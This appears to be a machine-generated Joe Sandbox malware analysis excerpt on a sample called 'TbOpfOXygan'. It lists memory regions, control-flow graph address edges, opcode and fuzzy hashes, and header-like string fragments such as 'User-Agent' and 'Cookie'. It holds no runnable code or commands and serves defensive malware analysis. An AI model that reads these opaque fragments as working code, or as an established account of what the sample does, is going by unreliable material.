              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction ID: e1508274446c273e533c2ca1ad09a3403c06f89b4de30b9662cd44269c8dc17c
              • Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction Fuzzy Hash: FD11AD724045149FDF03BF20D5C48AA73EDAF41704B450AAA9D89EE449EF709254CEE9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 26809a8-26809bd 68 26809c8-26809ca 67->68 69 26809d0-2680a29 call 2680a1a call 268375b 68->69 70 2680b32-2680b33 68->70 78 2680b2d call 2680b34 69->78 79 2680a2f-2680a51 69->79 78->70 79->78 82 2680a57-2680a7c 79->82 82->78 84 2680a82-2680ac1 82->84 84->78 86 2680ac3-2680aef 84->86 86->78 88 2680af1-2680afd 86->88 90 2680b02-2680b26 88->90 90->70 93 2680b28-2680b2b 90->93 93->78 93->90
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: a676d2061a0bf99d860f967df782a7b8129a9f2224ddc859ce9e595b66f4a122
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: AA01F471644318AFEB12DE50CC85FAA73FCEF44B04F510595BB49EE0C5EAB065848AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 2683fde-2683ffa call 268375b call 26838a7 99 268400c-268403b call 268404d * 3 94->99 100 2683ffc-268400a call 268411e 94->100 113 2684046 99->113 107 268404b-268404c 100->107 113->107 114 2684046 call 268404d 113->114 114->107
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction ID: d664c5bc9737a260f92e5f878e4e7a9c35081460b3541e76bc63e8ab20fc057f
              • Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction Fuzzy Hash: 5AF065705482C5D7FB607FB0CC89B5E36A99F2174DF0402D9EA49BE495CF7884508E7A

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 26847f8-2684810 call 2683b24 143 2684820-2684850 140->143 144 2684812-268481b call 2683b76 140->144 147 268496a-268496f 143->147 148 2684856-2684878 143->148 144->143 148->147 150 268487e-26848a3 148->150 152 26848bb-26848dd 150->152 153 26848a5-26848ba 150->153 155 26848df-2684901 152->155 156 2684942-268494c 152->156 153->152 155->156 162 2684903-2684925 155->162 157 268494e-2684960 call 268377b 156->157 158 2684963-2684968 156->158 157->158 158->147 162->156 164 2684927-268493f 162->164 164->156
              Strings
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 4b907a4dded25301c541ff19e2e31a8c4c19adc1abc8a217dc94dcdb78d2df15
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: 354174B2600209BFEF22AF64CC48BDEBBB9FF84744F154159EA44AB254DB709650CF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 26847f7-2684803 116 268480e-2684810 115->116 117 2684809 call 2683b24 115->117 118 2684820-2684850 116->118 119 2684812-268481b call 2683b76 116->119 117->116 122 268496a-268496f 118->122 123 2684856-2684878 118->123 119->118 123->122 125 268487e-26848a3 123->125 127 26848bb-26848dd 125->127 128 26848a5-26848ba 125->128 130 26848df-2684901 127->130 131 2684942-268494c 127->131 128->127 130->131 137 2684903-2684925 130->137 132 268494e-2684960 call 268377b 131->132 133 2684963-2684968 131->133 132->133 133->122 137->131 139 2684927-268493f 137->139 139->131
              Strings
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 40b3ee5fe53218e8059285cf7479cd625af0be14ded4ee29c219be94e7f57af2
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: F94174B2600209BFEF229F64CC84BEEBBB9FF84744F154159EA44AB254DB709650CF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 255097f-25509a0 call 2550d05 call 2551506 call 2553dc8 8 25509a8-25509ca 0->8 10 25509d0-2550a29 call 2550a1a call 255375b 8->10 11 2550b32-2550b33 8->11 19 2550b2d call 2550b34 10->19 20 2550a2f-2550a51 10->20 19->11 20->19 23 2550a57-2550a7c 20->23 23->19 25 2550a82-2550ac1 23->25 25->19 27 2550ac3-2550aef 25->27 27->19 29 2550af1-2550afd 27->29 31 2550b02-2550b26 29->31 31->11 34 2550b28-2550b2b 31->34 34->19 34->31
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: b45694c255433161b592967e3b74e06041a67b0c8ea2e8ae7b0a80784df617e0
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 1E41BD71240228AFEF229F60CC85FA977ACFF44744F040196BE49AE0D5DB70A690CE69

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 2551386-2551393 36 2551435-2551436 35->36 37 2551399-255139f 35->37 37->36 38 25513a5-25513bb 37->38 38->36 40 25513bd-25513d0 38->40 42 25513d2-25513d9 40->42 43 25513dc-25513ec call 2550ebd 42->43 46 25513ee-25513fc 43->46 47 2551401-255142c 46->47 48 25513fe 46->48 47->36 48->47
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 2e216d82d488a6434709df4acf010a154fc2e1bf8a52a2a7f6863ee2a9664e4a
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 5F218B31900266AFDB119F78C848B9DBFB5BF44714F058226FD59AF2D0E770A810CB98

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: 0a6677450b70a5046ecc86b41bb43af0e4b2fd893816ae0a9843810e8ef259b4
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: D1110DB2414925AEDF03AF20C5D49AA73EDBE80704B46096A9D89EE049EF709154CEE9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 25509a8-25509ca 69 25509d0-2550a29 call 2550a1a call 255375b 67->69 70 2550b32-2550b33 67->70 78 2550b2d call 2550b34 69->78 79 2550a2f-2550a51 69->79 78->70 79->78 82 2550a57-2550a7c 79->82 82->78 84 2550a82-2550ac1 82->84 84->78 86 2550ac3-2550aef 84->86 86->78 88 2550af1-2550afd 86->88 90 2550b02-2550b26 88->90 90->70 93 2550b28-2550b2b 90->93 93->78 93->90
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: 16237d4b304d9167a7ce7c731d7b67161020c27435082c22572cd4492582923b
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: F101F471644328AFEB12DE50CC85FAA73FCEF44B04F500595BB49EE0C5EAB065848AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 2553fde-2553ffa call 255375b call 25538a7 99 255400c-255403b call 255404d * 3 94->99 100 2553ffc-255400a call 255411e 94->100 113 2554046 99->113 108 255404b-255404c 100->108 113->108 114 2554046 call 255404d 113->114 114->108
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction ID: 8123b9244fa7dbce5b400df1093b5befc029319c8ee1e31accf5c8cb94870909
              • Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction Fuzzy Hash: 5BF08C304482A1D7EB507FA0CCA8B6D36A9BF81308F000082AE4DBE4A0CE7840808E7A

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 25547f7-2554810 call 2553b24 118 2554820-2554850 115->118 119 2554812-255481b call 2553b76 115->119 122 2554856-2554878 118->122 123 255496a-255496f 118->123 119->118 122->123 125 255487e-25548a3 122->125 127 25548a5-25548ba 125->127 128 25548bb-25548dd 125->128 127->128 130 2554942-255494c 128->130 131 25548df-2554901 128->131 132 2554963-2554968 130->132 133 255494e-2554960 call 255377b 130->133 131->130 137 2554903-2554925 131->137 132->123 133->132 137->130 139 2554927-255493f 137->139 139->130
              Strings
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: ce2c7023a2f02dfd93baf75e035007c285fcd877b818b3cc9ddaf3d342734e39
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: 424174B2600218BFEF129F64CC44BDEBFB9FF84744F154059EA44AA154DB709650CF98

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 25547f8-2554803 141 255480e-2554810 140->141 142 2554809 call 2553b24 140->142 143 2554820-2554850 141->143 144 2554812-255481b call 2553b76 141->144 142->141 147 2554856-2554878 143->147 148 255496a-255496f 143->148 144->143 147->148 150 255487e-25548a3 147->150 152 25548a5-25548ba 150->152 153 25548bb-25548dd 150->153 152->153 155 2554942-255494c 153->155 156 25548df-2554901 153->156 157 2554963-2554968 155->157 158 255494e-2554960 call 255377b 155->158 156->155 162 2554903-2554925 156->162 157->148 158->157 162->155 164 2554927-255493f 162->164 164->155
              Strings
              Memory Dump Source
              • Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: e7eeb5809d985d97c160eb8a61178a61dcf26a5f12aea6ac15d03852e458f6e1
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: F24151B2600218BFEF129F64CC48BDEBFB9FF84744F154059EA44AA154DB709690CB98

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 213097f-21309a0 call 2130d05 call 2131506 call 2133dc8 8 21309a8-21309ca 0->8 10 2130b32-2130b33 8->10 11 21309d0-2130a29 call 2130a1a call 213375b 8->11 19 2130a2f-2130a51 11->19 20 2130b2d call 2130b34 11->20 19->20 23 2130a57-2130a7c 19->23 20->10 23->20 25 2130a82-2130ac1 23->25 25->20 27 2130ac3-2130aef 25->27 27->20 29 2130af1-2130afd 27->29 31 2130b02-2130b26 29->31 31->10 34 2130b28-2130b2b 31->34 34->20 34->31
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: cc9879bdc1773d553bedd92fad79b70ceb731a192b37d4c8455b99849bfe4460
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 42413D71680218AFEB239F60CC85FA977ADEF44744F040195BA49AE0D9DB70A690CE65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 2131386-2131393 36 2131435-2131436 35->36 37 2131399-213139f 35->37 37->36 38 21313a5-21313bb 37->38 38->36 40 21313bd-21313d0 38->40 42 21313d2-21313d9 40->42 43 21313dc-21313ec call 2130ebd 42->43 46 21313ee-21313fc 43->46 47 2131401-213142c 46->47 48 21313fe 46->48 47->36 48->47
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: a0caeba26ab064adbad120a127a2554c5b11f2f11754e050deae8cbf0820592b
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: AB219D31A44256AFDB12DF78C848B9DBBB6AF04724F058225F959AF2D0E770A810CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction ID: 4e074fa6ac65b70ee3b888f4903b80b3b027e667b3a1ac8bf46ecb06f87c6a0f
              • Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction Fuzzy Hash: B011C172444514AEEF03AF20C5C8CAB77EDEE40704B45096A9D89EF44DEF709154CEE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 21309a8-21309ca 69 2130b32-2130b33 67->69 70 21309d0-2130a29 call 2130a1a call 213375b 67->70 78 2130a2f-2130a51 70->78 79 2130b2d call 2130b34 70->79 78->79 82 2130a57-2130a7c 78->82 79->69 82->79 84 2130a82-2130ac1 82->84 84->79 86 2130ac3-2130aef 84->86 86->79 88 2130af1-2130afd 86->88 90 2130b02-2130b26 88->90 90->69 93 2130b28-2130b2b 90->93 93->79 93->90
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: 8ba4de1e51271b6d4937451cf128e2fb2cf12089e2e43ccb572449881f67f309
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: 4E01F471644318AFEB23DE50CC85FAA73FCEF44B44F500595BB49EE0C5EAB065848AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 2133fde-2133ffa call 213375b call 21338a7 99 213400c-213403b call 213404d * 3 94->99 100 2133ffc-213400a call 213411e 94->100 113 2134046 99->113 108 213404b-213404c 100->108 113->108 114 2134046 call 213404d 113->114 114->108
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: a26cda04d78c35127ff7c4c7306a1fff9e77f20bbcd0c8e19122027689031afd
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: 79F039706C8280DFFB627BB08C89B8D36AB9F01709F050090EA5ABE595CF7884508E76

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 21347f7-2134810 call 2133b24 118 2134812-213481b call 2133b76 115->118 119 2134820-2134850 115->119 118->119 122 2134856-2134878 119->122 123 213496a-213496f 119->123 122->123 125 213487e-21348a3 122->125 127 21348a5-21348ba 125->127 128 21348bb-21348dd 125->128 127->128 130 2134942-213494c 128->130 131 21348df-2134901 128->131 132 2134963-2134968 130->132 133 213494e-2134960 call 213377b 130->133 131->130 136 2134903-2134925 131->136 132->123 133->132 136->130 139 2134927-213493f 136->139 139->130
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: d15c3c546210b32b8eae87fd096f5beb3f6cb004180f221fa6757d6709b1e945
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: 294177B2600208BFEF129F64CC44BEEBBBAFF84744F154159EA44AB254DB749550CF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 21347f8-2134803 141 213480e-2134810 140->141 142 2134809 call 2133b24 140->142 143 2134812-213481b call 2133b76 141->143 144 2134820-2134850 141->144 142->141 143->144 147 2134856-2134878 144->147 148 213496a-213496f 144->148 147->148 150 213487e-21348a3 147->150 152 21348a5-21348ba 150->152 153 21348bb-21348dd 150->153 152->153 155 2134942-213494c 153->155 156 21348df-2134901 153->156 157 2134963-2134968 155->157 158 213494e-2134960 call 213377b 155->158 156->155 161 2134903-2134925 156->161 157->148 158->157 161->155 164 2134927-213493f 161->164 164->155
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 96954695dd69586eeb4cbc1767f6ef80bffdbfb6d15216b22c8307d2b702c3de
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: 074175B2600208BFEF129F64CC48BDEBBBAFF84744F154059EA44AB254DB749650CF94